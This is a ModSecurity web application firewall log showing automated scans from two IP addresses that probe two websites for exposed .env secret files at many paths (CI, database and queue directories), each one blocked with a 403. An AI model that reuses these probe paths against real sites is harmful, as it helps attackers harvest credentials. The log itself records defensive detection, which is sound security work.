[Mon May 11 16:42:02.427586 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/github/.env"] [unique_id "agHqulV4kyjgo4bQBUha8QAAAMg"]
[Mon May 11 16:42:02.530453 2026] [security2:error] [pid 1412074:tid 1412097] [client 45.12.2.133:37358] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agHquTJnyuKVXoStDha6pgAAAFU"]
[Mon May 11 16:42:02.596167 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /actions/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/actions/.env"] [unique_id "agHqulV4kyjgo4bQBUha8gAAAMg"]
[Mon May 11 16:42:02.596650 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/actions/.env"] [unique_id "agHqulV4kyjgo4bQBUha8gAAAMg"]
[Mon May 11 16:42:02.596903 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/actions/.env"] [unique_id "agHqulV4kyjgo4bQBUha8gAAAMg"]
[Mon May 11 16:42:02.757659 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /circleci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/circleci/.env"] [unique_id "agHqulV4kyjgo4bQBUha8wAAAMg"]
[Mon May 11 16:42:02.758134 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/circleci/.env"] [unique_id "agHqulV4kyjgo4bQBUha8wAAAMg"]
[Mon May 11 16:42:02.758394 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/circleci/.env"] [unique_id "agHqulV4kyjgo4bQBUha8wAAAMg"]
[Mon May 11 16:42:02.920195 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /travis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/travis/.env"] [unique_id "agHqulV4kyjgo4bQBUha9AAAAMg"]
[Mon May 11 16:42:02.920670 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/travis/.env"] [unique_id "agHqulV4kyjgo4bQBUha9AAAAMg"]
[Mon May 11 16:42:02.920903 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/travis/.env"] [unique_id "agHqulV4kyjgo4bQBUha9AAAAMg"]
[Mon May 11 16:42:03.076319 2026] [security2:error] [pid 1416109:tid 1416150] [client 45.12.2.133:37366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env_1"] [unique_id "agHqu1V4kyjgo4bQBUha9QAAANQ"]
[Mon May 11 16:42:03.076737 2026] [security2:error] [pid 1416109:tid 1416150] [client 45.12.2.133:37366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env_1"] [unique_id "agHqu1V4kyjgo4bQBUha9QAAANQ"]
[Mon May 11 16:42:03.089671 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /buildkite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/buildkite/.env"] [unique_id "agHqu1V4kyjgo4bQBUha9gAAAMg"]
[Mon May 11 16:42:03.090164 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/buildkite/.env"] [unique_id "agHqu1V4kyjgo4bQBUha9gAAAMg"]
[Mon May 11 16:42:03.090405 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/buildkite/.env"] [unique_id "agHqu1V4kyjgo4bQBUha9gAAAMg"]
[Mon May 11 16:42:03.253087 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mysql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/mysql/.env"] [unique_id "agHqu1V4kyjgo4bQBUha9wAAAMg"]
[Mon May 11 16:42:03.253632 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/mysql/.env"] [unique_id "agHqu1V4kyjgo4bQBUha9wAAAMg"]
[Mon May 11 16:42:03.253902 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/mysql/.env"] [unique_id "agHqu1V4kyjgo4bQBUha9wAAAMg"]
[Mon May 11 16:42:03.415197 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postgres/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/postgres/.env"] [unique_id "agHqu1V4kyjgo4bQBUha-AAAAMg"]
[Mon May 11 16:42:03.415768 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/postgres/.env"] [unique_id "agHqu1V4kyjgo4bQBUha-AAAAMg"]
[Mon May 11 16:42:03.416044 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/postgres/.env"] [unique_id "agHqu1V4kyjgo4bQBUha-AAAAMg"]
[Mon May 11 16:42:03.578811 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mongodb/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/mongodb/.env"] [unique_id "agHqu1V4kyjgo4bQBUha-gAAAMg"]
[Mon May 11 16:42:03.579320 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/mongodb/.env"] [unique_id "agHqu1V4kyjgo4bQBUha-gAAAMg"]
[Mon May 11 16:42:03.579574 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/mongodb/.env"] [unique_id "agHqu1V4kyjgo4bQBUha-gAAAMg"]
[Mon May 11 16:42:03.604601 2026] [security2:error] [pid 1416109:tid 1416150] [client 45.12.2.133:37366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agHqu1V4kyjgo4bQBUha9QAAANQ"]
[Mon May 11 16:42:03.740745 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /redis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/redis/.env"] [unique_id "agHqu1V4kyjgo4bQBUha-wAAAMg"]
[Mon May 11 16:42:03.741268 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/redis/.env"] [unique_id "agHqu1V4kyjgo4bQBUha-wAAAMg"]
[Mon May 11 16:42:03.741520 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/redis/.env"] [unique_id "agHqu1V4kyjgo4bQBUha-wAAAMg"]
[Mon May 11 16:42:03.902736 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /elasticsearch/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/elasticsearch/.env"] [unique_id "agHqu1V4kyjgo4bQBUha_AAAAMg"]
[Mon May 11 16:42:03.903281 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/elasticsearch/.env"] [unique_id "agHqu1V4kyjgo4bQBUha_AAAAMg"]
[Mon May 11 16:42:03.903542 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/elasticsearch/.env"] [unique_id "agHqu1V4kyjgo4bQBUha_AAAAMg"]
[Mon May 11 16:42:04.068510 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rabbitmq/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/rabbitmq/.env"] [unique_id "agHqvFV4kyjgo4bQBUha_QAAAMg"]
[Mon May 11 16:42:04.069000 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/rabbitmq/.env"] [unique_id "agHqvFV4kyjgo4bQBUha_QAAAMg"]
[Mon May 11 16:42:04.069258 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/rabbitmq/.env"] [unique_id "agHqvFV4kyjgo4bQBUha_QAAAMg"]
[Mon May 11 16:42:04.239147 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kafka/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/kafka/.env"] [unique_id "agHqvFV4kyjgo4bQBUha_wAAAMg"]
[Mon May 11 16:42:04.239619 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/kafka/.env"] [unique_id "agHqvFV4kyjgo4bQBUha_wAAAMg"]
[Mon May 11 16:42:04.239849 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/kafka/.env"] [unique_id "agHqvFV4kyjgo4bQBUha_wAAAMg"]
[Mon May 11 16:42:04.401594 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /queue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/queue/.env"] [unique_id "agHqvFV4kyjgo4bQBUhbAAAAAMg"]
[Mon May 11 16:42:04.402074 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/queue/.env"] [unique_id "agHqvFV4kyjgo4bQBUhbAAAAAMg"]
